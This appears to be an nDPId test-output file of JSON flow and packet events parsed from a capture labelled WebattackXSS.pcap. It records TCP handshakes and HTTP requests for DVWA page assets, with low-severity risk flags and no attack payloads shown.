+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1499346976999,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976999,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzF63DJWlxUqWlqAScSAyBwAAAgQFtAQCCAoD4sJ7ATjxBAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1499346976999,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976999,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzGAmGFC+ciJO0aAScSCizgAAAgQFtAQCCAoD4sJ7ATjxBAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1499346977000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346977000,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Z5JAAD4GXkasEAABwKgKMsxeAFDFSpaWtwyVpoAQAOXRDgAAAQEICgE48QQD4sJ7"} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1499346977000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346977000,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0v9VAAD4GBgOsEAABwKgKMsxgAFByIk7RJhhQv4AQAOVB1gAAAQEICgE48QQD4sJ7"} +00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976677,"flow_last_seen":1499346977863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":364,"flow_tot_l4_payload_len":364,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1499346977863,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/dvwa\/js\/dvwaPage.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976999,"flow_last_seen":1499346977870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1499346977870,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346983175,"flow_last_seen":1499346983175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346983175,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1499346983175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346983175,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ikRAAD4GO4ysEAABwKgKMsyiAFBY531IAAAAAKACchDDnAAAAgQFtAQCCAoBOPcMAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1499346983175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346983175,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzKJurEWjWOd9SaAScSBDxgAAAgQFtAQCCAoD4siDATj3DAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1499346983176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346983176,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ikVAAD4GO5OsEAABwKgKMsyiAFBY531JbqxFpIAQAOXizQAAAQEICgE49wwD4siD"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346984469,"flow_last_seen":1499346984469,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346984469,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1499346984469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346984469,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8puFAAD4GHu+sEAABwKgKMsywAFBLrV6uAAAAAKACchDuHwAAAgQFtAQCCAoBOPhPAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1499346984469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346984469,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzLBWnxN3S61er6AScSC3PwAAAgQFtAQCCAoD4snGATj4TwEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1499346984470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346984470,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0puJAAD4GHvasEAABwKgKMsywAFBLrV6vVp8TeIAQAOVWRgAAAQEICgE4+FAD4snG"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":206,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346985762,"flow_last_seen":1499346985762,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346985762,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1499346985762,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346985762,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8k7hAAD4GMhisEAABwKgKMsy+AFBA2morAAAAAKACchDsIwAAAgQFtAQCCAoBOPmTAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1499346985762,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346985762,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzL4AEHgfQNpqLKAScSCl5gAAAgQFtAQCCAoD4ssKATj5kwEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1499346985762,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346985762,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0k7lAAD4GMh+sEAABwKgKMsy+AFBA2mosABB4IIAQAOVE7gAAAQEICgE4+ZMD4ssK"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346988319,"flow_last_seen":1499346988319,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346988319,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1499346988319,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346988319,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NptAAD4GjzWsEAABwKgKMszYAFB2NsqJAAAAAKACchBT0AAAAgQFtAQCCAoBOPwSAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1499346988319,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346988319,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzNhVLB2odjbKiqAScSAQbwAAAgQFtAQCCAoD4s2JATj8EgEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1499346988319,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346988319,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NpxAAD4GjzysEAABwKgKMszYAFB2NsqKVSwdqYAQAOWvdgAAAQEICgE4\/BID4s2J"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346989580,"flow_last_seen":1499346989580,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346989580,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1499346989580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346989580,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8HPhAAD4GqNisEAABwKgKMszmAFB8FOG1AAAAAKACchA1fQAAAgQFtAQCCAoBOP1NAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1499346989580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346989580,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzOZrnFEQfBThtqAScSCnCAAAAgQFtAQCCAoD4s7EATj9TQEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1499346989581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346989581,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HPlAAD4GqN+sEAABwKgKMszmAFB8FOG2a5xREYAQAOVGDwAAAQEICgE4\/U4D4s7E"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346992144,"flow_last_seen":1499346992144,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346992144,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1499346992144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346992144,"pkt":"ABm5CmnxAMGxFOsxCABFAAA855pAAD4G3jWsEAABwKgKMs0AAFBUEBhUAAAAAKACchAkSAAAAgQFtAQCCAoBOP\/OAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1499346992144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346992144,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzQA256uwVBAYVaAScSBtZwAAAgQFtAQCCAoD4tFFATj\/zgEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1499346992145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346992145,"pkt":"ABm5CmnxAMGxFOsxCABFAAA055tAAD4G3jysEAABwKgKMs0AAFBUEBhVNuersYAQAOUMbgAAAQEICgE4\/88D4tFF"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346993434,"flow_last_seen":1499346993434,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346993434,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1499346993434,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346993434,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QspAAD4GgwasEAABwKgKMs0OAFBi7kPbAAAAAKACchDokQAAAgQFtAQCCAoBOQERAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1499346993435,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346993435,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzQ7bbxEWYu5D3KAScSAmgAAAAgQFtAQCCAoD4tKIATkBEQEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1499346993435,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346993435,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QstAAD4Ggw2sEAABwKgKMs0OAFBi7kPc228RF4AQAOXFhwAAAQEICgE5ARED4tKI"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346994731,"flow_last_seen":1499346994731,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346994731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1499346994731,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346994731,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ErdAAD4GsxmsEAABwKgKMs0cAFAyGBDiAAAAAKACchBLDwAAAgQFtAQCCAoBOQJVAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1499346994731,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346994731,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzRyBtZXkMhgQ46AScSBcpQAAAgQFtAQCCAoD4tPMATkCVQEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1499346994732,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346994732,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ErhAAD4GsyCsEAABwKgKMs0cAFAyGBDjgbWV5YAQAOX7rAAAAQEICgE5AlUD4tPM"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346997314,"flow_last_seen":1499346997314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346997314,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1499346997314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346997314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZWRAAD4GYGysEAABwKgKMs02AFBhbWG\/AAAAAKACchDIPAAAAgQFtAQCCAoBOQTbAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1499346997314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346997314,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzTaSy6RrYW1hwKAScSC3rwAAAgQFtAQCCAoD4tZSATkE2wEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1499346997315,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346997315,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZWVAAD4GYHOsEAABwKgKMs02AFBhbWHAksukbIAQAOVWtwAAAQEICgE5BNsD4tZS"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346998578,"flow_last_seen":1499346998578,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346998578,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52548,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1499346998578,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346998578,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8K3xAAD4GmlSsEAABwKgKMs1EAFB2Xi1rAAAAAKACchDmVQAAAgQFtAQCCAoBOQYXAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1499346998579,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346998579,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzUQbBzt5dl4tbKAScSC1QwAAAgQFtAQCCAoD4teOATkGFwEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1499346998579,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346998579,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0K31AAD4GmlusEAABwKgKMs1EAFB2Xi1sGwc7eoAQAOVUSwAAAQEICgE5BhcD4teO"} 